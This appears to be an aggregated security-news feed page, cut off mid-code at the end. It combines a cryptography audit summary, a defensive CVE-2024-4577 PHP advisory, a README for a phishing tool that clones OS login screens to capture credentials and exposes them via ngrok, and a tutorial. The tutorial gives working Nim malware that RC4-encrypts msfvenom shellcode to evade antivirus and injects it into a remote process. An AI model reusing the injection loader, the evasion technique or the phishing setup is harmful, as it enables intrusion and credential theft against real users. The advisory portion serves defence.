– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.


Public Report – Keyfork Implementation Review

By: R.Rivera
6 June 2024 at 15:28

In April 2024, Distrust engaged NCC Group’s Cryptography Services team to perform a cryptographic security assessment of keyfork, described as “an opinionated and modular toolchain for generating and managing a wide range of cryptographic keys offline and on smartcards from a shared mnemonic phrase”. The tool is intended to be run on an air-gapped system and allows a user to split or recover a cryptographic key using Shamir Secret Sharing, with shares imported and exported using mechanisms such as mnemonics or QR codes. These shares can be managed by one or more users, with a defined threshold of shares required to recover the original secret. A retest was conducted in May 2024, which resulted in all findings and notes being marked Fixed.

The review targeted the tagged release keyfork-v0.1.0 of the keyfork repository. Distrust indicated that memory-related (e.g., zeroization) and timing-related attacks were not a concern due to the trusted nature of the hardware and its environment, and as such were not investigated in detail.

Several engagement notes and low-impact findings were uncovered, each of which was promptly addressed by Distrust.

Security Alert: PHP Remote Code Execution (CVE-2024-4577) - PHP CGI Argument Injection Vulnerability

5 June 2024 at 16:00

English Version, 中文版本

During DEVCORE's forward-looking offensive research, the research team discovered a remote code execution vulnerability in the PHP programming language. Given how widely PHP is used in the web ecosystem and how easily this vulnerability can be reproduced, the team classified it as critical and reported it to the PHP official team immediately. The official team released a fixed version on 2024/06/06; see the disclosure timeline for the detailed schedule.

Vulnerability Description

The PHP language's design overlooked the Best-Fit behavior of character encoding conversion inside the Windows operating system. As a result, an unauthenticated attacker can use specific character sequences to bypass the earlier protection for CVE-2012-1823 and execute arbitrary code on remote PHP servers through attacks such as argument injection.

Impact

This vulnerability affects all PHP versions installed on the Windows operating system; see the table below for details:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Since the PHP 8.0 branch, PHP 7, and PHP 5 are no longer officially maintained, website administrators can refer to the "Am I Vulnerable?" section below and find temporary mitigations in the patch recommendations.

Am I Vulnerable?

For the common combination of Apache HTTP Server and PHP, website administrators can use the two methods listed in this article to confirm whether their servers are vulnerable. Note that Scenario 2 is also the default configuration of XAMPP for Windows, so all versions of XAMPP for Windows installations are affected by default.

As of this writing, it has been verified that when the Windows operating system is running in the following locales, an unauthenticated attacker can directly execute arbitrary code on the remote server:

  • Traditional Chinese (Code Page 950)
  • Simplified Chinese (Code Page 936)
  • Japanese (Code Page 932)

For Windows systems running in other locales such as English, Korean, and Western European, because PHP is used in such a wide range of scenarios, it is currently not possible to fully enumerate and rule out every exploitation scenario. We therefore still recommend that users take a complete inventory of their assets, verify their usage scenarios, and update PHP to the latest version to be safe.

Scenario 1: Running PHP in CGI mode

When the Apache Httpd configuration uses the Action directive to hand matching HTTP requests to the PHP-CGI executable, the server is affected by this vulnerability. Common configurations include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario 2: Exposing the PHP executable (the default XAMPP installation configuration)

Even if PHP is not configured to run in CGI mode, merely exposing the PHP executable in a CGI directory is also affected by this vulnerability. Common cases include, but are not limited to:

  1. Copying php.exe or php-cgi.exe into the /cgi-bin/ directory
  2. Exposing the PHP installation directory externally via ScriptAlias, for example:
     ScriptAlias /php-cgi/ "C:/xampp/php/"
    

Mitigation

It is strongly recommended that all users upgrade to the latest official PHP versions 8.3.8, 8.2.20, or 8.1.29. For systems that cannot be upgraded, the vulnerability can be temporarily mitigated using the methods below.

In addition, since PHP CGI is an outdated and problem-prone architecture, we also recommend evaluating the possibility of migrating to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot upgrade PHP

The following Rewrite rules can be used to block attacks. Please note that these rules are only a temporary mitigation for the Traditional Chinese, Simplified Chinese, and Japanese locales; in practice, updating to a fixed version or changing the architecture is still recommended.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

2. For XAMPP for Windows users

At the time of writing, XAMPP has not yet released an updated installer for this vulnerability. If you have confirmed that your XAMPP installation does not use the PHP CGI feature, you can avoid exposure by modifying the following Apache Httpd configuration file:

C:/xampp/apache/conf/extra/httpd-xampp.conf

Find the corresponding line:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

Disclosure Timeline

  • 2024/05/07 - DEVCORE reported this issue through the official PHP vulnerability disclosure page.
  • 2024/05/07 - PHP developers confirmed the vulnerability and emphasized the need for a prompt fix.
  • 2024/05/16 - PHP developers released the first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released the second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered the preparation phase for the new version release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.

References

Security Alert: CVE-2024-4577 - PHP CGI Argument Injection Vulnerability

5 June 2024 at 16:00

English Version, 中文版本

During DEVCORE’s continuous offensive research, our team discovered a remote code execution vulnerability in PHP. Due to the widespread use of the programming language in the web ecosystem and the ease of exploitability, DEVCORE classified its severity as critical, and promptly reported it to the PHP official team. The official team released a patch on 2024/06/06. Please refer to the timeline for disclosure details.

Description

While implementing PHP, the team did not notice the Best-Fit feature of encoding conversion within the Windows operating system. This oversight allows unauthenticated attackers to bypass the previous protection of CVE-2012-1823 by specific character sequences. Arbitrary code can be executed on remote PHP servers through the argument injection attack.

Impact

This vulnerability affects all versions of PHP installed on the Windows operating system. Please refer to the table below for details:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Since the PHP 8.0 branch, PHP 7, and PHP 5 are End-of-Life and no longer maintained, server admins can refer to the Am I Vulnerable section, and find temporary patch recommendations in the Mitigation Measure section.

Am I Vulnerable?

For the usual combination of Apache HTTP Server and PHP, server administrators can use the two methods listed in this article to determine whether their servers are vulnerable. It is worth noting that Scenario 2 is also the default configuration for XAMPP for Windows, so all versions of XAMPP installations on Windows are vulnerable by default.

As of this writing, it has been verified that when Windows is running in the following locales, an unauthenticated attacker can directly execute arbitrary code on the remote server:

  • Traditional Chinese (Code Page 950)
  • Simplified Chinese (Code Page 936)
  • Japanese (Code Page 932)

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

Scenario 1: Running PHP under CGI mode

When configuring the Action directive to map corresponding HTTP requests to a PHP-CGI executable binary in Apache HTTP Server, this vulnerability can be exploited directly. Common configurations affected include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

Or

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario 2: Exposing the PHP binary (also the default XAMPP configuration)

Even if PHP is not configured under the CGI mode, merely exposing the PHP executable binary in the CGI directory is affected by this vulnerability, too. Common scenarios include, but are not limited to:

  1. Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.
  2. Exposing the PHP directory via ScriptAlias directive, such as:
     ScriptAlias /php-cgi/ "C:/xampp/php/"
    

Mitigation Measure

It is strongly recommended that all users upgrade to the latest PHP versions of 8.3.8, 8.2.20, and 8.1.29. For systems that cannot be upgraded, the following instructions can be used to temporarily mitigate the vulnerability.

However, since PHP CGI is an outdated and problematic architecture, it’s still recommended to evaluate the possibility of migrating to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot upgrade PHP:

The following Rewrite Rules can be used to block attacks. Please note that these rules are only a temporary mitigation for Traditional Chinese, Simplified Chinese, and Japanese locales. It is still recommended to update to a patched version or migrate the architecture in practice.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

2. For users who use XAMPP for Windows:

XAMPP has not yet released corresponding update files for this vulnerability at the time of writing this article. If you confirm that you do not need the PHP CGI feature, you can avoid exposure to the vulnerability by modifying the following Apache HTTP Server configuration:

C:/xampp/apache/conf/extra/httpd-xampp.conf

Locate the corresponding line:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

Timeline

  • 2024/05/07 - DEVCORE reported this issue through the official PHP vulnerability disclosure page.
  • 2024/05/07 - PHP developers confirmed the vulnerability and emphasized the need for a prompt fix.
  • 2024/05/16 - PHP developers released the first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released the second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered the preparation phase for the new version release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.

Reference

Thief Raccoon - Login Phishing Tool


Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


Features

  • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
  • Capture user credentials for educational demonstrations.
  • Customizable login screens that mimic real operating systems.
  • Full-screen mode to enhance the phishing simulation.

Installation

Prerequisites

  • Python 3.x
  • pip (Python package installer)
  • ngrok (for exposing the local server to the internet)

Download and Install

  1. Clone the repository:

```bash
git clone https://github.com/davenisc/thief_raccoon.git
cd thief_raccoon
```

  2. Install python venv:

```bash
apt install python3.11-venv
```

  3. Create venv:

```bash
python -m venv raccoon_venv
source raccoon_venv/bin/activate
```

  4. Install the required libraries:

```bash
pip install -r requirements.txt
```

Usage

  1. Run the main script:

```bash
python app.py
```

  2. Select the operating system for the phishing simulation:

After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

  3. Access the phishing page:

If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

If you want to make the phishing page accessible over the internet, use ngrok.

Using ngrok

  1. Download and install ngrok:

Download ngrok from ngrok.com and follow the installation instructions for your operating system.

  2. Expose your local server to the internet:

  3. Get the public URL:

After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

How to install Ngrok on Linux?

  1. Install ngrok via Apt with the following command:

```bash
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
  | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
  && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
  | sudo tee /etc/apt/sources.list.d/ngrok.list \
  && sudo apt update \
  && sudo apt install ngrok
```

  2. Run the following command to add your authtoken to the default ngrok.yml:

```bash
ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx
```

Deploy your app online

  1. Put your app online at an ephemeral domain, forwarding to your upstream service. For example, since this app listens on http://localhost:5000, run:

```bash
ngrok http http://localhost:5000
```

Example

  1. Run the main script:

```bash
python app.py
```

  2. Select Windows 11 from the menu:

```
Select the operating system for phishing:
1. Windows 10
2. Windows 11
3. Windows XP
4. Windows Server
5. Ubuntu
6. Ubuntu Server
7. macOS
Enter the number of your choice: 2
```

  3. Access the phishing page:

Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

Disclaimer

This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

License

This project is licensed under the MIT License. See the LICENSE file for details.

ScreenShots

Credits

Developer: @davenisc Web: https://davenisc.com



Malware and cryptography 28: RC4 payload encryption. Simple Nim example.

1 June 2024 at 01:00

Hello, cybersecurity enthusiasts and white hackers!


Many of my readers ask whether it is possible to write malware in a language other than C/C++/ASM.

When malware is written in newer programming languages, AV detections often fail, since the new language produces code and byte sequences that are relatively unknown, combined with strings of data that can throw off static-based heuristic models.

As an experiment, I decided to show how to write a simple malware example using Nim lang. The reason for this choice is the ease of the language and its flexibility for use in bypassing AV/EDR solutions.

For installation and an introduction, you can read the official documentation.

In one of my previous posts I used the RC4 algorithm to encrypt the payload. Let’s create the same logic for Nim malware.

practical example 1

First of all, create the RC4 algorithm logic. RC4 is a simple algorithm, and a C++ implementation looks like this:

// swap
void swap(unsigned char *a, unsigned char *b) {
  unsigned char tmp;
  tmp = *a;
  *a = *b;
  *b = tmp;
}

// key-scheduling algorithm (KSA)
void KSA(unsigned char *s, unsigned char *key, int keyL) {
  int k;
  int x, y = 0;

  // initialize
  for (k = 0; k < 256; k++) {
    s[k] = k;
  }

  for (x = 0; x < 256; x++) {
    y = (y + s[x] + key[x % keyL]) % 256;
    swap(&s[x], &s[y]);
  }
  return;
}

// pseudo-random generation algorithm (PRGA)
unsigned char* PRGA(unsigned char* s, unsigned int messageL) {
  int i = 0, j = 0;
  int k;

  unsigned char* keystream;
  keystream = (unsigned char *)malloc(sizeof(unsigned char)*messageL);
  for(k = 0; k < messageL; k++) {
    i = (i + 1) % 256;
    j = (j + s[i]) % 256;
    swap(&s[i], &s[j]);
    keystream[k] = s[(s[i] + s[j]) % 256];
	}
	return keystream;
}

// encryption and decryption
unsigned char* RC4(unsigned char *plaintext, unsigned char* ciphertext, unsigned char* key, unsigned int keyL, unsigned int messageL) {
  int i;
  unsigned char s[256];
  unsigned char* keystream;
  KSA(s, key, keyL);
  keystream = PRGA(s, messageL);

  for (i = 0; i < messageL; i++) {
    ciphertext[i] = plaintext[i] ^ keystream[i];
  }
  return ciphertext;
}

In Nim, the same logic looks like this:

import strutils
import sequtils
import system

proc swap(a: var byte, b: var byte) =
  let tmp = a
  a = b
  b = tmp

proc KSA(s: var seq[byte], key: seq[byte]) =
  let keyL = len(key)
  var y = 0

  # initialize
  for k in 0 ..< 256:
    s[k] = byte(k)

  for x in 0 ..< 256:
    y = (y + int(s[x]) + int(key[x mod keyL])) mod 256
    swap(s[x], s[y.byte])

proc PRGA(s: var seq[byte], messageL: int): seq[byte] =
  var i = 0
  var j = 0
  result = newSeq[byte](messageL)

  for k in 0 ..< messageL:
    i = (i + 1) mod 256
    j = (j + int(s[i])) mod 256
    swap(s[i], s[j.byte])
    result[k] = s[(int(s[i]) + int(s[j])) mod 256]

proc RC4(plaintext: seq[byte], key: seq[byte]): seq[byte] =
  let messageL = len(plaintext)
  var s = newSeq[byte](256) 
  KSA(s, key)
  let keystream = PRGA(s, messageL)

  result = newSeq[byte](messageL)
  for i in 0 ..< messageL:
    result[i] = plaintext[i] xor keystream[i]

To check correctness, add logic that prints the payload's hex bytes:

when isMainModule:
  let plaintext: seq[byte] = @[// payload here]
  let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]

  let ciphertext = RC4(plaintext, key)
  var enchex: seq[string]
  for b in ciphertext:
    enchex.add("0x" & $toHex(b, 2))
  echo "payload encrypted:\n", enchex.join(", ")

  let decrypted = RC4(ciphertext, key)
  var decrhex: seq[string]
  for b in decrypted:
    decrhex.add("0x" & $toHex(b, 2))
  echo "original payload:\n", decrhex.join(", ")

How can we generate a payload for Nim?

For this we can use msfvenom:

msfvenom -p windows/x64/messagebox TEXT='meow-meow!' TITLE='cat' -f csharp


In our case, we slightly modify the brackets and the variable declaration:

let plaintext: seq[byte] = @[
byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,
0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,
0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,
0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,
0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,
0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,
0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,
0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,
0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,
0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,
0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,
0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,
0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x09,0x01,0x00,0x00,0x48,
0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,
0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6d,0x65,0x6f,
0x77,0x2d,0x6d,0x65,0x6f,0x77,0x21,0x00,0x63,0x61,0x74,0x00
]

So the final full source code (hack.nim) looks like this:

import strutils
import sequtils
import system

proc swap(a: var byte, b: var byte) =
  let tmp = a
  a = b
  b = tmp

proc KSA(s: var seq[byte], key: seq[byte]) =
  let keyL = len(key)
  var y = 0

  # initialize
  for k in 0 ..< 256:
    s[k] = byte(k)

  for x in 0 ..< 256:
    y = (y + int(s[x]) + int(key[x mod keyL])) mod 256
    swap(s[x], s[y.byte])

proc PRGA(s: var seq[byte], messageL: int): seq[byte] =
  var i = 0
  var j = 0
  result = newSeq[byte](messageL)

  for k in 0 ..< messageL:
    i = (i + 1) mod 256
    j = (j + int(s[i])) mod 256
    swap(s[i], s[j.byte])
    result[k] = s[(int(s[i]) + int(s[j])) mod 256]

proc RC4(plaintext: seq[byte], key: seq[byte]): seq[byte] =
  let messageL = len(plaintext)
  var s = newSeq[byte](256) 
  KSA(s, key)
  let keystream = PRGA(s, messageL)

  result = newSeq[byte](messageL)
  for i in 0 ..< messageL:
    result[i] = plaintext[i] xor keystream[i]

when isMainModule:
  let plaintext: seq[byte] = @[
    byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,
    0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
    0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
    0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,
    0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,
    0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,
    0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,
    0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,
    0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
    0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,
    0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,
    0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
    0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,
    0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,
    0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,
    0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
    0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
    0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,
    0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,
    0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x09,0x01,0x00,0x00,0x48,
    0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,
    0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6d,0x65,0x6f,
    0x77,0x2d,0x6d,0x65,0x6f,0x77,0x21,0x00,0x63,0x61,0x74,0x00
    ]
  let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]

  let ciphertext = RC4(plaintext, key)
  var enchex: seq[string]
  for b in ciphertext:
    enchex.add("0x" & $toHex(b, 2))
  echo "payload encrypted:\n", enchex.join(", ")

  let decrypted = RC4(ciphertext, key)
  var decrhex: seq[string]
  for b in decrypted:
    decrhex.add("0x" & $toHex(b, 2))
  echo "original payload:\n", decrhex.join(", ")

demo 1

Let’s check it in action. Compile it:

nim c -d:mingw --cpu:amd64 hack.nim


Then, just move it to the victim’s machine (Windows 11 in my case) and run:

.\hack.exe


To check the correctness of the RC4 encryption/decryption, you can also use simple C code.
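If C is not handy, an equivalent quick cross-check in a few lines of Python works as well (a sketch, not from the original post):

def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):                        # KSA
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:                              # PRGA + XOR
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

key = b"meowmeow"                               # same key bytes as in the Nim code
ct = rc4(key, b"meow-meow!")
assert rc4(key, ct) == b"meow-meow!"            # RC4 decryption is the same operation
print(ct.hex())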

practical example 2

Let’s update our code from example 1: add simple process injection logic.

For process injection, let’s create a process first:

import osproc
import winim

let process = startProcess("mspaint.exe")
echo "started  process: ", process.processID

Then, add process injection logic via VirtualAllocEx, WriteProcessMemory and CreateRemoteThread:

let ph = winim.OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](process.processID)
)

when isMainModule:
    let mem = VirtualAllocEx(
        ph,
        NULL,
        cast[SIZE_T](plaintext.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READWRITE
    )
    var btw: SIZE_T
    let wp = WriteProcessMemory(
        ph,
        mem,
        unsafeAddr payload[0],
        cast[SIZE_T](plaintext.len),
        addr btw
    )
    echo "writeprocessmemory: ", bool(wp)
    let th = CreateRemoteThread(
        ph,
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](mem),
        NULL,
        0,
        NULL
    )
    echo "successfully inject to process: ", process.processID
    echo "thread Handle: ", th

The only difference is that we are using the encrypted payload from example 1:

let plaintext: seq[byte] = @[
byte 0x61, 0x03, 0xDF, 0x4C, 0xE0, 0x8E, 0xFF, 0x5F, 0xB2, 0x7F, 0x28, 0x22, 0xE9,
0x3B, 0x1A, 0x09, 0xB6, 0x66, 0x78, 0xCD, 0xAD, 0x67, 0xE1, 0x18, 0x82, 0x91,
0x83, 0x1C, 0xE9, 0x9D, 0x09, 0x80, 0xFB, 0x0F, 0xD7, 0x3A, 0x06, 0xB2, 0xF2, 
0x6B, 0x0C, 0xA4, 0x93, 0x29, 0xBE, 0x3D, 0x73, 0x78, 0xEE, 0xD5, 0x6B, 0xB7, 
0xB5, 0x5B, 0x98, 0xF0, 0x8E, 0x61, 0xD3, 0x3F, 0x2B, 0xEB, 0x06, 0xA2, 0x9B, 
0xE5, 0xDA, 0xED, 0x0C, 0xF1, 0xF4, 0x64, 0x82, 0x8B, 0x96, 0xD0, 0x71, 0x9A, 
0xCB, 0x59, 0x41, 0x7C, 0x52, 0x06, 0x4D, 0xC7, 0x00, 0xEC, 0x80, 0xDD, 0xDF, 
0x37, 0x4D, 0x3C, 0x25, 0x82, 0xB4, 0x37, 0xE6, 0x25, 0x75, 0xDC, 0xBE, 0xF0, 
0x1E, 0xD1, 0x1A, 0xDE, 0x2D, 0xB8, 0xA2, 0xA1, 0x6B, 0x7D, 0x0F, 0xC0, 0xC0, 
0x66, 0x4A, 0x9E, 0x9A, 0x9A, 0x93, 0x6B, 0xA4, 0x63, 0x51, 0xA0, 0x91, 0xB0, 
0x99, 0x21, 0xDC, 0xDB, 0x41, 0xF7, 0xCC, 0xB8, 0xD5, 0x4B, 0xFF, 0xA2, 0x58, 
0xA8, 0xEF, 0xE3, 0x90, 0x50, 0x3C, 0x03, 0x30, 0x42, 0x3C, 0x1B, 0x5F, 0x9C, 
0x8F, 0xF2, 0xC7, 0x19, 0xA5, 0x07, 0x3E, 0x1C, 0x70, 0x6E, 0x80, 0xDA, 0x23, 
0x37, 0x51, 0x98, 0x7D, 0xBE, 0x55, 0xF9, 0x56, 0x52, 0x0E, 0x48, 0x40, 0x2D, 
0x9A, 0xD3, 0x0F, 0xB8, 0x92, 0x62, 0xE7, 0x5C, 0x0A, 0x2E, 0xFE, 0xF8, 0x96, 
0x8E, 0x10, 0x6A, 0x04, 0x0B, 0xDD, 0x24, 0xCB, 0x18, 0x20, 0x9E, 0x23, 0x9A, 
0x57, 0xC1, 0x38, 0xC0, 0xD7, 0x0A, 0x57, 0x3E, 0x80, 0x75, 0x9B, 0x79, 0x59, 
0xB6, 0x31, 0xE4, 0x3E, 0xBA, 0xBB, 0x1E, 0x91, 0xC5, 0x10, 0xA0, 0x63, 0x6B, 
0x99, 0x9F, 0x61, 0x6C, 0xB5, 0x1A, 0x09, 0x61, 0xFD, 0x21, 0xCC, 0x64, 0xC4, 
0x9C, 0xCA, 0x15, 0xA1, 0x3B, 0x62, 0x44, 0x5B, 0x34, 0xDC, 0x06, 0xEB, 0x8F, 
0xB1, 0x50, 0x7B, 0x1C, 0x77, 0xC7, 0x8B, 0x24, 0x34, 0x5E, 0xC4, 0x02, 0x00, 
0x3F, 0x1D, 0x05, 0x2E, 0x18, 0xC5, 0xEA, 0x6D, 0x6F
]
let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]
let payload = RC4(plaintext, key)

As you can see, we decrypt it via RC4.

The final full source code for example 2 (hack2.nim) looks like this:

import strutils
import sequtils
import system
import osproc
import winim

proc swap(a: var byte, b: var byte) =
  let tmp = a
  a = b
  b = tmp

proc KSA(s: var seq[byte], key: seq[byte]) =
  let keyL = len(key)
  var y = 0

  # initialize
  for k in 0 ..< 256:
    s[k] = byte(k)

  for x in 0 ..< 256:
    y = (y + int(s[x]) + int(key[x mod keyL])) mod 256
    swap(s[x], s[y.byte])

proc PRGA(s: var seq[byte], messageL: int): seq[byte] =
  var i = 0
  var j = 0
  result = newSeq[byte](messageL)

  for k in 0 ..< messageL:
    i = (i + 1) mod 256
    j = (j + int(s[i])) mod 256
    swap(s[i], s[j.byte])
    result[k] = s[(int(s[i]) + int(s[j])) mod 256]

proc RC4(plaintext: seq[byte], key: seq[byte]): seq[byte] =
  let messageL = len(plaintext)
  var s = newSeq[byte](256) 
  KSA(s, key)
  let keystream = PRGA(s, messageL)

  result = newSeq[byte](messageL)
  for i in 0 ..< messageL:
    result[i] = plaintext[i] xor keystream[i]

when isMainModule:
  let plaintext: seq[byte] = @[
    byte 0x61, 0x03, 0xDF, 0x4C, 0xE0, 0x8E, 0xFF, 0x5F, 0xB2, 0x7F, 0x28, 0x22, 0xE9,
    0x3B, 0x1A, 0x09, 0xB6, 0x66, 0x78, 0xCD, 0xAD, 0x67, 0xE1, 0x18, 0x82, 0x91,
    0x83, 0x1C, 0xE9, 0x9D, 0x09, 0x80, 0xFB, 0x0F, 0xD7, 0x3A, 0x06, 0xB2, 0xF2, 
    0x6B, 0x0C, 0xA4, 0x93, 0x29, 0xBE, 0x3D, 0x73, 0x78, 0xEE, 0xD5, 0x6B, 0xB7, 
    0xB5, 0x5B, 0x98, 0xF0, 0x8E, 0x61, 0xD3, 0x3F, 0x2B, 0xEB, 0x06, 0xA2, 0x9B, 
    0xE5, 0xDA, 0xED, 0x0C, 0xF1, 0xF4, 0x64, 0x82, 0x8B, 0x96, 0xD0, 0x71, 0x9A, 
    0xCB, 0x59, 0x41, 0x7C, 0x52, 0x06, 0x4D, 0xC7, 0x00, 0xEC, 0x80, 0xDD, 0xDF, 
    0x37, 0x4D, 0x3C, 0x25, 0x82, 0xB4, 0x37, 0xE6, 0x25, 0x75, 0xDC, 0xBE, 0xF0, 
